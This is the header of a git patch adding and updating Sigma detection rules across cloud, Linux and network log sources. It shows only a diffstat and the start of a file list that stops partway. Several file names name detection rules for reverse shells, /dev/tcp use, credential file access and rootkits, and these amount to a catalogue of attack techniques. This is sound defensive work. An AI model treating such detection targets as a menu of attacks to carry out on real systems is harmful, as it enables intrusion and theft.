From edfff4bc608a1959dfc9feb4f96bd02506a19a09 Mon Sep 17 00:00:00 2001 From: Subhobrata Dey Date: Tue, 19 Mar 2024 15:17:46 -0700 Subject: [PATCH] add latest sigma rules (#942) 
Signed-off-by: Subhobrata Dey --- ...d_secops_ca_policy_removedby_bad_actor.yml | 24 ++++ ...d_secops_ca_policy_updatedby_bad_actor.yml | 24 ++++ ...secops_new_ca_policy_addedby_bad_actor.yml | 22 ++++ .../azure_aadhybridhealth_adfs_new_server.yml | 37 +++--- ...re_aadhybridhealth_adfs_service_delete.yml | 37 +++--- .../rules/azure/azure_account_lockout.yml | 29 ++--- .../azure_ad_account_created_deleted.yml | 25 ++++ .../azure/azure_ad_auth_failure_increase.yml | 22 ++++ .../azure/azure_ad_auth_sucess_increase.yml | 23 ++++ ...mportant_apps_using_single_factor_auth.yml | 23 ++++ ...om_countries_you_do_not_operate_out_of.yml | 25 ++++ .../azure/azure_ad_azurehound_discovery.yml | 23 ++++ .../azure_ad_bitlocker_key_retrieval.yml | 22 ++++ ...evice_registration_or_join_without_mfa.yml | 24 ++++ ..._ad_device_registration_policy_changes.yml | 23 ++++ ...om_countries_you_do_not_operate_out_of.yml | 25 ++++ ...ted_to_tenant_by_non_approved_inviters.yml | 24 ++++ ...re_ad_only_single_factor_auth_required.yml | 24 ++++ ..._singlefactorauth_from_unknown_devices.yml | 24 ++++ ..._ad_sign_ins_from_noncompliant_devices.yml | 21 ++++ ...azure_ad_sign_ins_from_unknown_devices.yml | 25 ++++ ...ure_ad_suspicious_signin_bypassing_mfa.yml | 28 +++++ .../azure_ad_user_added_to_admin_role.yml | 28 +++++ ...e_ad_users_added_to_device_admin_roles.yml | 28 +++++ .../azure/azure_app_appid_uri_changes.yml | 32 ++--- .../azure/azure_app_credential_added.yml | 30 ++--- .../azure_app_credential_modification.yml | 23 ++-- ...re_app_delegated_permissions_all_users.yml | 21 ++++ .../azure_app_device_code_authentication.yml | 36 +++--- .../azure/azure_app_end_user_consent.yml | 21 ++++ .../azure_app_end_user_consent_blocked.yml | 21 ++++ .../rules/azure/azure_app_owner_added.yml | 26 ++--- .../azure/azure_app_permissions_msft.yml | 23 ++++ .../azure_app_privileged_permissions.yml | 26 +++++ .../rules/azure/azure_app_role_added.yml | 25 ++++ .../azure/azure_app_ropc_authentication.yml | 34 +++--- 
.../azure/azure_app_uri_modifications.yml | 34 +++--- .../rules/azure/azure_application_deleted.yml | 25 ++-- ...pplication_gateway_modified_or_deleted.yml | 25 ++-- ...ion_security_group_modified_or_deleted.yml | 25 ++-- .../azure/azure_blocked_account_attempt.yml | 14 +-- .../azure_change_to_authentication_method.yml | 35 +++--- .../azure_conditional_access_failure.yml | 14 ++- ..._container_registry_created_or_deleted.yml | 23 ++-- ...creating_number_of_resources_detection.yml | 25 ++-- ..._device_no_longer_managed_or_compliant.yml | 19 +-- ...e_or_configuration_modified_or_deleted.yml | 25 ++-- .../azure_dns_zone_modified_or_deleted.yml | 30 ++--- .../rules/azure/azure_federation_modified.yml | 26 ++--- .../azure_firewall_modified_or_deleted.yml | 25 ++-- ...ll_rule_collection_modified_or_deleted.yml | 25 ++-- .../azure_granting_permission_detection.yml | 23 ++-- ...re_group_user_addition_ca_modification.yml | 23 ++++ ...ure_group_user_removal_ca_modification.yml | 23 ++++ .../azure/azure_guest_invite_failure.yml | 23 ++++ .../rules/azure/azure_guest_to_member.yml | 24 ++++ ...re_identity_protection_anomalous_token.yml | 22 ++++ ...ure_identity_protection_anomalous_user.yml | 22 ++++ ...ntity_protection_anonymous_ip_activity.yml | 25 ++++ ...entity_protection_anonymous_ip_address.yml | 22 ++++ ...re_identity_protection_atypical_travel.yml | 25 ++++ ..._identity_protection_impossible_travel.yml | 25 ++++ ...ntity_protection_inbox_forwarding_rule.yml | 22 ++++ ...identity_protection_inbox_manipulation.yml | 22 ++++ ...identity_protection_leaked_credentials.yml | 22 ++++ ...entity_protection_malicious_ip_address.yml | 22 ++++ ...ection_malicious_ip_address_suspicious.yml | 22 ++++ ..._identity_protection_malware_linked_ip.yml | 22 ++++ ..._identity_protection_new_coutry_region.yml | 25 ++++ ...ure_identity_protection_password_spray.yml | 22 ++++ .../azure_identity_protection_prt_access.yml | 22 ++++ ...identity_protection_suspicious_browser.yml | 25 ++++ 
...azure_identity_protection_threat_intel.yml | 26 +++++ ...entity_protection_token_issuer_anomaly.yml | 22 ++++ ..._identity_protection_unfamilar_sign_in.yml | 25 ++++ ...azure_keyvault_key_modified_or_deleted.yml | 31 ++--- .../azure_keyvault_modified_or_deleted.yml | 31 ++--- ...e_keyvault_secrets_modified_or_deleted.yml | 31 ++--- .../azure_kubernetes_admission_controller.yml | 50 ++++---- ..._kubernetes_cluster_created_or_deleted.yml | 23 ++-- .../rules/azure/azure_kubernetes_cronjob.yml | 42 +++---- .../azure/azure_kubernetes_events_deleted.yml | 25 ++-- ...azure_kubernetes_network_policy_change.yml | 25 ++-- .../azure/azure_kubernetes_pods_deleted.yml | 27 ++--- .../azure/azure_kubernetes_role_access.yml | 23 ++-- ...rnetes_rolebinding_modified_or_deleted.yml | 25 ++-- ...ernetes_secret_or_config_object_access.yml | 21 ++-- ...es_service_account_modified_or_deleted.yml | 24 ++-- .../azure_legacy_authentication_protocols.yml | 32 +++++ .../azure/azure_login_to_disabled_account.yml | 31 ++--- .../rules/azure/azure_mfa_denies.yml | 33 +++--- .../rules/azure/azure_mfa_disabled.yml | 13 +-- .../rules/azure/azure_mfa_interrupted.yml | 42 ++++--- ...rk_firewall_policy_modified_or_deleted.yml | 25 ++-- ...work_firewall_rule_modified_or_deleted.yml | 23 ++-- ...re_network_p2s_vpn_modified_or_deleted.yml | 23 ++-- ...e_network_security_modified_or_deleted.yml | 23 ++-- ...ork_virtual_device_modified_or_deleted.yml | 27 +++-- .../azure/azure_new_cloudshell_created.yml | 23 ++-- ..._from_application_or_service_principal.yml | 23 ++-- .../rules/azure/azure_pim_account_stale.yml | 22 ++++ .../azure_pim_activation_approve_deny.yml | 21 ++++ .../rules/azure/azure_pim_alerts_disabled.yml | 22 ++++ .../rules/azure/azure_pim_change_settings.yml | 22 ++++ .../rules/azure/azure_pim_invalid_license.yml | 22 ++++ ...azure_pim_role_assigned_outside_of_pim.yml | 22 ++++ .../azure_pim_role_frequent_activation.yml | 22 ++++ .../azure/azure_pim_role_no_mfa_required.yml | 22 ++++ 
.../rules/azure/azure_pim_role_not_used.yml | 22 ++++ .../azure_pim_too_many_global_admins.yml | 22 ++++ .../azure_priviledged_role_assignment_add.yml | 24 ++++ ...riviledged_role_assignment_bulk_change.yml | 23 ++++ .../azure_privileged_account_creation.yml | 26 +++++ .../rules/azure/azure_rare_operations.yml | 34 +++--- .../azure/azure_service_principal_created.yml | 23 ++-- .../azure/azure_service_principal_removed.yml | 23 ++-- ...permissions_elevation_via_activitylogs.yml | 32 ++--- ...on_permissions_elevation_via_auditlogs.yml | 34 +++--- .../azure/azure_suppression_rule_created.yml | 25 ++-- .../resources/rules/azure/azure_tap_added.yml | 22 ++++ ...re_unusual_authentication_interruption.yml | 43 +++---- ...er_login_blocked_by_conditional_access.yml | 33 +++--- .../azure/azure_user_password_change.yml | 27 +++++ ...thenticating_to_other_azure_ad_tenants.yml | 24 ++++ ...re_virtual_network_modified_or_deleted.yml | 25 ++-- ...ure_vpn_connection_modified_or_deleted.yml | 23 ++-- .../aws_attached_malicious_lambda_layer.yml | 23 ++-- .../aws_cloudtrail_disable_logging.yml | 14 +-- .../aws_config_disable_recording.yml | 22 ++-- .../cloudtrail/aws_console_getsignintoken.yml | 28 +++++ .../rules/cloudtrail/aws_delete_identity.yml | 23 ++++ .../aws_disable_bucket_versioning.yml | 23 ++++ .../cloudtrail/aws_ec2_disable_encryption.yml | 8 +- .../aws_ec2_startup_script_change.yml | 16 +-- .../cloudtrail/aws_ec2_vm_export_failure.yml | 42 +++---- ...cs_task_definition_cred_endpoint_query.yml | 31 +++++ .../aws_efs_fileshare_modified_or_deleted.yml | 16 ++- ...fs_fileshare_mount_modified_or_deleted.yml | 13 ++- .../aws_eks_cluster_created_or_deleted.yml | 21 ++-- ...aws_elasticache_security_group_created.yml | 22 ++-- ...che_security_group_modified_or_deleted.yml | 20 ++-- .../rules/cloudtrail/aws_enum_buckets.yml | 30 +++++ .../cloudtrail/aws_guardduty_disruption.yml | 14 +-- .../aws_iam_backdoor_users_keys.yml | 19 +-- ...ws_iam_s3browser_loginprofile_creation.yml | 27 
+++++ ...er_templated_s3_bucket_policy_creation.yml | 30 +++++ ...m_s3browser_user_or_accesskey_creation.yml | 27 +++++ ...ssed_role_to_glue_development_endpoint.yml | 31 +++-- .../aws_rds_change_master_password.yml | 16 +-- .../cloudtrail/aws_rds_public_db_restore.yml | 14 +-- .../cloudtrail/aws_root_account_usage.yml | 30 ++--- ...te_53_domain_transferred_lock_disabled.yml | 21 ++-- ..._domain_transferred_to_another_account.yml | 17 +-- .../aws_s3_data_management_tampering.yml | 34 +++--- .../aws_securityhub_finding_evasion.yml | 12 +- .../aws_snapshot_backup_exfiltration.yml | 25 ++-- .../rules/cloudtrail/aws_sso_idp_change.yml | 32 +++++ .../cloudtrail/aws_sts_assumerole_misuse.yml | 22 ++-- .../aws_sts_getsessiontoken_misuse.yml | 23 ++-- .../cloudtrail/aws_susp_saml_activity.yml | 37 +++--- .../cloudtrail/aws_update_login_profile.yml | 17 +-- .../github/github_delete_action_invoked.yml | 11 +- ...github_disable_high_risk_configuration.yml | 18 +-- ...d_outdated_dependency_or_vulnerability.yml | 18 +-- .../rules/github/github_new_org_member.yml | 16 +-- .../github/github_new_secret_created.yml | 15 +-- .../github_outside_collaborator_detected.yml | 11 +- ...github_push_protection_bypass_detected.yml | 23 ++++ .../github_push_protection_disabled.yml | 30 +++++ ...ithub_secret_scanning_feature_disabled.yml | 26 +++++ ...ub_self_hosted_runner_changes_detected.yml | 18 +-- ...ace_application_access_levels_modified.yml | 28 +++++ .../gcp_gworkspace_application_removed.yml | 26 +++++ ...p_gworkspace_granted_domain_api_access.yml | 25 ++++ .../gcp_gworkspace_mfa_disabled.yml | 28 +++++ ...cp_gworkspace_role_modified_or_deleted.yml | 27 +++++ .../gcp_gworkspace_role_privilege_deleted.yml | 24 ++++ ...orkspace_user_granted_admin_privileges.yml | 26 +++++ .../auditd/lnx_auditd_alter_bash_profile.yml | 35 ------ .../linux/auditd/lnx_auditd_audio_capture.yml | 35 +++--- .../lnx_auditd_auditing_config_change.yml | 38 +++--- .../auditd/lnx_auditd_binary_padding.yml | 48 
++++---- .../lnx_auditd_bpfdoor_file_accessed.yml | 27 +++++ .../lnx_auditd_bpfdoor_port_redirect.yml | 30 +++++ .../lnx_auditd_capabilities_discovery.yml | 43 +++---- .../lnx_auditd_change_file_time_attr.yml | 42 +++---- .../lnx_auditd_chattr_immutable_removal.yml | 30 ++--- .../lnx_auditd_clipboard_collection.yml | 29 ++--- .../lnx_auditd_clipboard_image_collection.yml | 51 ++++---- .../linux/auditd/lnx_auditd_coinminer.yml | 7 +- .../auditd/lnx_auditd_create_account.yml | 30 ++--- ...itd_cve_2021_3156_sudo_buffer_overflow.yml | 42 ------- ...21_3156_sudo_buffer_overflow_brutforce.yml | 29 ----- .../linux/auditd/lnx_auditd_cve_2021_4034.yml | 28 ----- .../auditd/lnx_auditd_data_compressed.yml | 42 +++---- .../auditd/lnx_auditd_data_exfil_wget.yml | 36 +++--- .../auditd/lnx_auditd_dd_delete_file.yml | 11 +- .../lnx_auditd_disable_system_firewall.yml | 35 +++--- .../lnx_auditd_file_or_folder_permissions.yml | 28 ++--- .../auditd/lnx_auditd_find_cred_in_files.yml | 33 +++--- .../lnx_auditd_hidden_binary_execution.yml | 31 +++++ .../lnx_auditd_hidden_files_directories.yml | 48 ++++---- ..._auditd_hidden_zip_files_steganography.yml | 42 +++---- .../lnx_auditd_keylogging_with_pam_d.yml | 48 ++++---- .../auditd/lnx_auditd_ld_so_preload_mod.yml | 26 ++--- .../auditd/lnx_auditd_load_module_insmod.yml | 23 ++-- .../lnx_auditd_logging_config_change.yml | 36 +++--- .../auditd/lnx_auditd_masquerading_crond.yml | 33 +++--- .../lnx_auditd_modify_system_firewall.yml | 37 ++++++ .../lnx_auditd_network_service_scanning.yml | 42 +++---- .../auditd/lnx_auditd_network_sniffing.yml | 48 ++++---- ..._scx_runasprovider_executeshellcommand.yml | 21 ++-- .../lnx_auditd_password_policy_discovery.yml | 55 +++++---- .../auditd/lnx_auditd_pers_systemd_reload.yml | 33 +++--- .../lnx_auditd_screencapture_import.yml | 61 +++++----- .../auditd/lnx_auditd_screencaputre_xwd.yml | 44 +++---- .../lnx_auditd_split_file_into_pieces.yml | 28 ++--- ...nx_auditd_steghide_embed_steganography.yml | 46 
++++---- ..._auditd_steghide_extract_steganography.yml | 40 +++---- .../auditd/lnx_auditd_susp_c2_commands.yml | 25 ++-- .../linux/auditd/lnx_auditd_susp_cmds.yml | 52 ++++----- .../auditd/lnx_auditd_susp_exe_folders.yml | 60 +++++----- .../lnx_auditd_susp_histfile_operations.yml | 52 ++++----- .../lnx_auditd_system_info_discovery.yml | 64 ++++++---- .../lnx_auditd_system_info_discovery2.yml | 30 ++--- .../lnx_auditd_system_shutdown_reboot.yml | 50 ++++---- .../lnx_auditd_systemd_service_creation.yml | 39 +++---- ..._unix_shell_configuration_modification.yml | 53 +++++++++ ...d_unzip_hidden_zip_files_steganography.yml | 38 +++--- .../auditd/lnx_auditd_user_discovery.yml | 30 ++--- .../rules/linux/auditd/lnx_auditd_web_rce.yml | 18 +-- ...auth_pwnkit_local_privilege_escalation.yml | 25 ++++ .../clamav/lnx_clamav_relevant_message.yml} | 12 +- .../lnx_cron_crontab_file_modification.yml} | 15 ++- .../lnx_guacamole_susp_guacamole.yml | 22 ++++ .../builtin/lnx_apt_equationgroup_lnx.yml | 82 +++++++++++++ .../linux/builtin/lnx_buffer_overflows.yml | 12 +- .../rules/linux/builtin/lnx_clear_syslog.yml | 9 +- .../rules/linux/builtin/lnx_file_copy.yml | 12 +- .../builtin/lnx_ldso_preload_injection.yml | 15 +-- ...nimbuspwn_privilege_escalation_exploit.yml | 30 ++--- .../lnx_potential_susp_ebpf_activity.yml | 21 ++++ .../builtin/lnx_privileged_user_creation.yml | 34 ++++++ .../linux/builtin/lnx_proxy_connection.yml | 21 ---- .../lnx_pwnkit_local_privilege_escalation.yml | 23 ---- .../rules/linux/builtin/lnx_setgid_setuid.yml | 25 ---- .../builtin/lnx_shell_clear_cmd_history.yml | 31 +++-- .../linux/builtin/lnx_shell_priv_esc_prep.yml | 71 ------------ .../linux/builtin/lnx_shell_susp_commands.yml | 88 +++++++------- .../builtin/lnx_shell_susp_log_entries.yml | 26 +++-- .../builtin/lnx_shell_susp_rev_shells.yml | 68 +++++------ .../rules/linux/builtin/lnx_shellshock.yml | 14 +-- .../builtin/lnx_space_after_filename_.yml | 22 ++-- .../rules/linux/builtin/lnx_susp_dev_tcp.yml | 
44 +++---- .../rules/linux/builtin/lnx_susp_jexboss.yml | 26 ++--- .../linux/builtin/lnx_symlink_etc_passwd.yml | 22 ++-- .../sshd/lnx_sshd_ssh_cve_2018_15473.yml | 22 ++++ .../linux/builtin/sshd/lnx_sshd_susp_ssh.yml | 33 ++++++ .../lnx_sudo_cve_2019_14287_user.yml | 16 +-- ...yslog_security_tools_disabling_syslog.yml} | 20 ++-- .../builtin/syslog/lnx_syslog_susp_named.yml | 24 ++++ .../vsftpd/lnx_vsftpd_susp_error_messages.yml | 38 ++++++ .../file_create_lnx_cron_files.yml | 32 ----- .../file_event_lnx_doas_conf_creation.yml} | 3 +- .../file_event_lnx_persistence_cron_files.yml | 33 ++++++ ...le_event_lnx_persistence_sudoers_files.yml | 22 ++++ ...p_shell_script_under_profile_directory.yml | 27 +++++ ...ent_lnx_triple_cross_rootkit_lock_file.yml | 21 ++++ ...t_lnx_triple_cross_rootkit_persistence.yml | 24 ++++ ...vent_lnx_wget_download_file_in_tmp_dir.yml | 27 +++++ .../modsecurity/modsec_mulitple_blocks.yml | 23 ---- ..._connection_lnx_back_connect_shell_dev.yml | 30 ++--- ...onnection_lnx_crypto_mining_indicators.yml | 7 +- .../net_connection_lnx_ngrok_tunnel.yml | 35 ++++++ .../linux/other/lnx_ssh_cve_2018_15473.yml | 22 ---- .../lnx_susp_failed_logons_single_source.yml | 25 ---- .../rules/linux/other/lnx_susp_guacamole.yml | 22 ---- .../rules/linux/other/lnx_susp_named.yml | 24 ---- .../rules/linux/other/lnx_susp_ssh.yml | 33 ------ .../rules/linux/other/lnx_susp_vsftp.yml | 38 ------ .../proc_creation_lnx_at_command.yml | 19 +-- .../proc_creation_lnx_base64_decode.yml | 24 ++-- .../proc_creation_lnx_base64_execution.yml | 34 ++++++ .../proc_creation_lnx_base64_shebang_cli.yml | 27 +++++ ...oc_creation_lnx_bash_interactive_shell.yml | 23 ++++ ...creation_lnx_bpf_kprob_tracing_enabled.yml | 28 +++++ ...ation_lnx_bpftrace_unsafe_option_usage.yml | 28 ++--- .../proc_creation_lnx_capa_discovery.yml | 25 ++++ .../proc_creation_lnx_cat_sudoers.yml | 32 ++--- ..._creation_lnx_chattr_immutable_removal.yml | 25 ++++ .../proc_creation_lnx_clear_logs.yml | 14 ++- 
.../proc_creation_lnx_clear_syslog.yml | 45 ++++---- ...proc_creation_lnx_clipboard_collection.yml | 43 ++++--- ...c_creation_lnx_cp_passwd_or_shadow_tmp.yml | 28 +++++ .../proc_creation_lnx_crontab_enumeration.yml | 25 ++++ .../proc_creation_lnx_crontab_removal.yml | 23 ++++ .../proc_creation_lnx_crypto_mining.yml | 62 +++++----- .../proc_creation_lnx_curl_usage.yml | 22 ++++ ...nx_cve_2022_26134_atlassian_confluence.yml | 8 +- ...22_33891_spark_shell_command_injection.yml | 27 +++++ .../proc_creation_lnx_dd_file_overwrite.yml | 37 +++--- ...proc_creation_lnx_dd_process_injection.yml | 26 +++++ .../proc_creation_lnx_disable_ufw.yml | 28 +++++ .../proc_creation_lnx_doas_execution.yml | 2 +- ..._creation_lnx_esxcli_network_discovery.yml | 29 +++++ ...ion_lnx_esxcli_permission_change_admin.yml | 25 ++++ ..._creation_lnx_esxcli_storage_discovery.yml | 30 +++++ ...eation_lnx_esxcli_syslog_config_change.yml | 28 +++++ ...c_creation_lnx_esxcli_system_discovery.yml | 28 +++++ ...ation_lnx_esxcli_user_account_creation.yml | 25 ++++ .../proc_creation_lnx_esxcli_vm_discovery.yml | 27 +++++ .../proc_creation_lnx_esxcli_vm_kill.yml | 26 +++++ ...roc_creation_lnx_esxcli_vsan_discovery.yml | 30 +++++ ...ation_lnx_file_and_directory_discovery.yml | 42 +++---- .../proc_creation_lnx_file_deletion.yml | 14 ++- ...oc_creation_lnx_grep_os_arch_discovery.yml | 33 ++++++ .../proc_creation_lnx_groupdel.yml | 24 ++++ .../proc_creation_lnx_gtfobin_apt.yml | 25 ++++ .../proc_creation_lnx_gtfobin_vim.yml | 39 +++++++ ..._creation_lnx_install_root_certificate.yml | 30 ++--- ...eation_lnx_install_suspicioua_packages.yml | 47 ++++++++ .../proc_creation_lnx_iptables_flush_ufw.yml | 41 +++++++ .../proc_creation_lnx_kill_process.yml | 25 ++++ .../proc_creation_lnx_local_account.yml | 57 ++++----- .../proc_creation_lnx_local_groups.yml | 38 +++--- ..._malware_gobrat_grep_payload_discovery.yml | 28 +++++ ...reation_lnx_mkfifo_named_pipe_creation.yml | 21 ++++ 
...fifo_named_pipe_creation_susp_location.yml | 26 +++++ .../proc_creation_lnx_mount_hidepid.yml | 26 +++++ ...proc_creation_lnx_netcat_reverse_shell.yml | 59 ++++++++++ ..._creation_lnx_network_service_scanning.yml | 31 ----- .../proc_creation_lnx_nohup.yml | 25 ++-- ...proc_creation_lnx_nohup_susp_execution.yml | 27 +++++ ...omigod_scx_runasprovider_executescript.yml | 25 ++-- ..._scx_runasprovider_executeshellcommand.yml | 23 ++-- .../proc_creation_lnx_perl_reverse_shell.yml | 31 +++++ .../proc_creation_lnx_php_reverse_shell.yml | 36 ++++++ .../proc_creation_lnx_process_discovery.yml | 20 ++-- .../proc_creation_lnx_proxy_connection.yml | 24 ++++ .../proc_creation_lnx_python_pty_spawn.yml | 28 +++-- ...proc_creation_lnx_python_reverse_shell.yml | 30 +++++ ...s_tools_teamviewer_incoming_connection.yml | 30 +++++ ...c_creation_lnx_remote_system_discovery.yml | 70 +++++------ .../proc_creation_lnx_remove_package.yml | 42 +++++++ .../proc_creation_lnx_ruby_reverse_shell.yml | 34 ++++++ ...oc_creation_lnx_schedule_task_job_cron.yml | 32 ++--- ...eation_lnx_security_software_discovery.yml | 50 ++++---- ..._creation_lnx_security_tools_disabling.yml | 56 ++++----- ...creation_lnx_services_stop_and_disable.yml | 26 +++++ .../proc_creation_lnx_setgid_setuid.yml | 27 +++++ .../proc_creation_lnx_ssm_agent_abuse.yml | 29 +++++ ...proc_creation_lnx_sudo_cve_2019_14287.yml} | 19 +-- ...oc_creation_lnx_susp_chmod_directories.yml | 36 +++--- ...lnx_susp_container_residence_discovery.yml | 38 ++++++ ...proc_creation_lnx_susp_curl_fileupload.yml | 41 +++++++ .../proc_creation_lnx_susp_curl_useragent.yml | 28 +++++ ...proc_creation_lnx_susp_dockerenv_recon.yml | 32 +++++ ...creation_lnx_susp_execution_tmp_folder.yml | 24 ++++ .../proc_creation_lnx_susp_find_execution.yml | 33 ++++++ .../proc_creation_lnx_susp_git_clone.yml | 41 +++++++ .../proc_creation_lnx_susp_history_delete.yml | 42 ++++--- .../proc_creation_lnx_susp_history_recon.yml | 43 ++++--- 
.../proc_creation_lnx_susp_hktl_execution.yml | 99 ++++++++++++++++ .../proc_creation_lnx_susp_inod_listing.yml | 28 +++++ ...roc_creation_lnx_susp_interactive_bash.yml | 47 ++++---- .../proc_creation_lnx_susp_java_children.yml | 6 +- ...n_lnx_susp_network_utilities_execution.yml | 42 +++++++ .../proc_creation_lnx_susp_pipe_shell.yml | 39 ++++--- ...roc_creation_lnx_susp_recon_indicators.yml | 32 ++--- ...reation_lnx_susp_sensitive_file_access.yml | 50 ++++++++ ...l_child_process_from_parent_tmp_folder.yml | 31 +++++ ...p_shell_script_exec_from_susp_location.yml | 35 ++++++ ...roc_creation_lnx_system_info_discovery.yml | 18 +-- ...x_system_network_connections_discovery.yml | 39 ++++--- ..._creation_lnx_system_network_discovery.yml | 46 ++++---- .../proc_creation_lnx_touch_susp.yml | 24 ++++ ...lnx_triple_cross_rootkit_execve_hijack.yml | 22 ++++ ...ation_lnx_triple_cross_rootkit_install.yml | 27 +++++ .../proc_creation_lnx_userdel.yml | 24 ++++ .../proc_creation_lnx_usermod_susp_group.yml | 25 ++++ .../proc_creation_lnx_webshell_detection.yml | 68 ++++++----- ...lnx_wget_download_suspicious_directory.yml | 29 +++++ .../proc_creation_lnx_xterm_reverse_shell.yml | 24 ++++ .../rules/m365/microsoft365_disabling_mfa.yml | 21 ++++ ...ft365_new_federated_domain_added_audit.yml | 29 +++++ ...65_new_federated_domain_added_exchange.yml | 30 +++++ .../m365/microsoft365_pst_export_alert.yml | 2 +- ...alert_using_new_compliancesearchaction.yml | 2 +- .../cisco/aaa/cisco_cli_clear_logs.yml | 32 +++-- .../cisco/aaa/cisco_cli_collect_data.yml | 45 ++++---- .../cisco/aaa/cisco_cli_crypto_actions.yml | 37 +++--- .../cisco/aaa/cisco_cli_disable_logging.yml | 35 +++--- .../network/cisco/aaa/cisco_cli_discovery.yml | 65 +++++------ .../rules/network/cisco/aaa/cisco_cli_dos.yml | 31 +++-- .../cisco/aaa/cisco_cli_file_deletion.yml | 33 +++--- .../cisco/aaa/cisco_cli_input_capture.yml | 27 +++-- .../cisco/aaa/cisco_cli_local_accounts.yml | 27 +++-- 
.../cisco/aaa/cisco_cli_modify_config.yml | 45 ++++---- .../cisco/aaa/cisco_cli_moving_data.yml | 43 ++++--- .../network/cisco/aaa/cisco_cli_net_sniff.yml | 29 +++-- .../cisco/bgp/cisco_bgp_md5_auth_failed.yml | 35 ++++++ .../cisco/ldp/cisco_ldp_md5_auth_failed.yml | 35 ++++++ .../net_firewall_cleartext_protocols.yml | 89 ++++++++++++++ .../zeek_dce_rpc_mitre_bzar_execution.yml | 84 +++++++------- .../zeek_dce_rpc_mitre_bzar_persistence.yml | 56 ++++----- ...rpc_potential_petit_potam_efs_rpc_call.yml | 19 ++- ...pc_printnightmare_print_driver_install.yml | 19 +-- .../zeek_dce_rpc_smb_spoolss_named_pipe.yml | 10 +- ...zeek_default_cobalt_strike_certificate.yml | 22 ++-- .../network/zeek/zeek_dns_mining_pools.yml | 24 ++-- .../rules/network/zeek/zeek_dns_nkn.yml | 28 ++--- .../network/zeek/zeek_dns_susp_zbit_flag.yml | 109 ++++++++---------- .../rules/network/zeek/zeek_dns_torproxy.yml | 16 ++- ...k_http_executable_download_from_webdav.yml | 32 ++--- .../zeek/zeek_http_omigod_no_auth_rce.yml | 27 +++-- .../zeek/zeek_http_webdav_put_request.yml | 38 +++--- .../network/zeek/zeek_rdp_public_listener.yml | 50 +++----- .../zeek_smb_converted_win_atsvc_task.yml | 37 +++--- ..._smb_converted_win_impacket_secretdump.yml | 34 +++--- .../zeek_smb_converted_win_lm_namedpipe.yml | 64 +++++----- .../zeek_smb_converted_win_susp_psexec.yml | 46 ++++---- ...verted_win_susp_raccess_sensitive_fext.yml | 54 +++++---- ...ransferring_files_with_credential_data.yml | 45 ++++---- .../network/zeek/zeek_susp_kerberos_rc4.yml | 28 ++--- .../mapper/MapperRestApiIT.java | 4 +- 425 files changed, 8618 insertions(+), 3959 deletions(-) create mode 100644 src/main/resources/rules/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml create mode 100644 src/main/resources/rules/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml create mode 100644 src/main/resources/rules/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml create mode 100644 
src/main/resources/rules/azure/azure_ad_account_created_deleted.yml create mode 100644 src/main/resources/rules/azure/azure_ad_auth_failure_increase.yml create mode 100644 src/main/resources/rules/azure/azure_ad_auth_sucess_increase.yml create mode 100644 src/main/resources/rules/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml create mode 100644 src/main/resources/rules/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml create mode 100644 src/main/resources/rules/azure/azure_ad_azurehound_discovery.yml create mode 100644 src/main/resources/rules/azure/azure_ad_bitlocker_key_retrieval.yml create mode 100644 src/main/resources/rules/azure/azure_ad_device_registration_or_join_without_mfa.yml create mode 100644 src/main/resources/rules/azure/azure_ad_device_registration_policy_changes.yml create mode 100644 src/main/resources/rules/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml create mode 100644 src/main/resources/rules/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml create mode 100644 src/main/resources/rules/azure/azure_ad_only_single_factor_auth_required.yml create mode 100644 src/main/resources/rules/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml create mode 100644 src/main/resources/rules/azure/azure_ad_sign_ins_from_noncompliant_devices.yml create mode 100644 src/main/resources/rules/azure/azure_ad_sign_ins_from_unknown_devices.yml create mode 100644 src/main/resources/rules/azure/azure_ad_suspicious_signin_bypassing_mfa.yml create mode 100644 src/main/resources/rules/azure/azure_ad_user_added_to_admin_role.yml create mode 100644 src/main/resources/rules/azure/azure_ad_users_added_to_device_admin_roles.yml create mode 100644 src/main/resources/rules/azure/azure_app_delegated_permissions_all_users.yml create mode 100644 src/main/resources/rules/azure/azure_app_end_user_consent.yml create mode 100644 
src/main/resources/rules/azure/azure_app_end_user_consent_blocked.yml create mode 100644 src/main/resources/rules/azure/azure_app_permissions_msft.yml create mode 100644 src/main/resources/rules/azure/azure_app_privileged_permissions.yml create mode 100644 src/main/resources/rules/azure/azure_app_role_added.yml create mode 100644 src/main/resources/rules/azure/azure_group_user_addition_ca_modification.yml create mode 100644 src/main/resources/rules/azure/azure_group_user_removal_ca_modification.yml create mode 100644 src/main/resources/rules/azure/azure_guest_invite_failure.yml create mode 100644 src/main/resources/rules/azure/azure_guest_to_member.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_anomalous_token.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_anomalous_user.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_activity.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_address.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_atypical_travel.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_impossible_travel.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_inbox_forwarding_rule.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_inbox_manipulation.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_leaked_credentials.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address_suspicious.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_malware_linked_ip.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_new_coutry_region.yml create mode 100644 
